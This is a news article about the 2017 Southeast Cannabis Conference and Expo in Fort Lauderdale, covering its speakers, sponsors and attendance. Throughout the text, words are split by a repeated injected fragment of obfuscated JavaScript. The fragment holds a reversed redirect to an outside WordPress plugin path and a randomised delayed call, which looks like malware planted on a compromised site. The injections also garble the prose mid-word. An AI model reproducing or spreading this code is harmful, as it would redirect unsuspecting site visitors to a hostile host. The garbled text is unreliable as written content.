Southeast Cannabis Conference & Expo 2017 – CANNABIZ NEWS

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A video montage from the floor of the first annual Southeast Cannabis Conference and Expo. Shot June 12th, 2017.

South Florida’s cannabis community will never be the same after last week’s mega-marijuana event, Southeast Cannabis Conference and Expo in Fort Lauderdale. Headlined by talk show host and veteran, Montel Williams and great pro athletes like Marvin Washingtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton and Florida favorite Ricky Williams, SECC is the state’s first full-scale cannabis expo and conference and the state’s largest marijuana-themed conference and trade show.

The two-day event, sponsored by WeedMaps, FlavRx, Advanced Nutrients, and dozens of other cannabis and media businesses featured over 100 exhibitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tors, dozens of speakers and classes in both working and investing in the industry and attracted speakers, exhibitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tors and attendees from as far away as Hawaii.

As expected, the event attracted major canna-business celebrities like Cheryl Shuman, but also on hand were dozens of Florida’s own cannabis reformer heroes. In addition toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to the event being co-sponsored by the Florida Cannabis Coalition and Regulate Florida (the state’s new legalization initiative), United for Care’s Ben Pollara (from the successful 2016 ballot measure) and renown cannabis lawyer Michael Minardi spoke throughout the convention.

Former national NORML executive directoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor, Norm Kent gave one of the keynotes, and Central Florida NORML’s outspoken Chris Cano, were all treated like celebrities. In honor of South Florida’s huge Hispanic population, the conference also featured an entire track of presentations en espanol.
On Saturday, a veterans’ rally honored those who have served and now seek access toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to cannabis toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to heal service related physical and emotional injuries. At the Friday reception and again on Sunday the stars came out as Ricky Williams and a crew of former NFL stars held panel discussions on using cannabis toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to help cope with the grueling physical demands of life in the big leagues and treat the pains and injuries that are a daily part of the job.

Last November Florida voters approved medical marijuana by more than 71%. Despite setbacks at the state legislature this spring, Florida’s newly developing cannabis industry is expected toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top one billion dollars annually by 2020.

Though the numbers are still being tallied, organizers estimate over 3,500 attended the main convention, with hundreds joining off-site after parties Friday and Saturday evenings.

Video produced by R&D Cannabis Marketing
“Superboat” Instrumental by Kid Conch, courtesy of Conchcast Media

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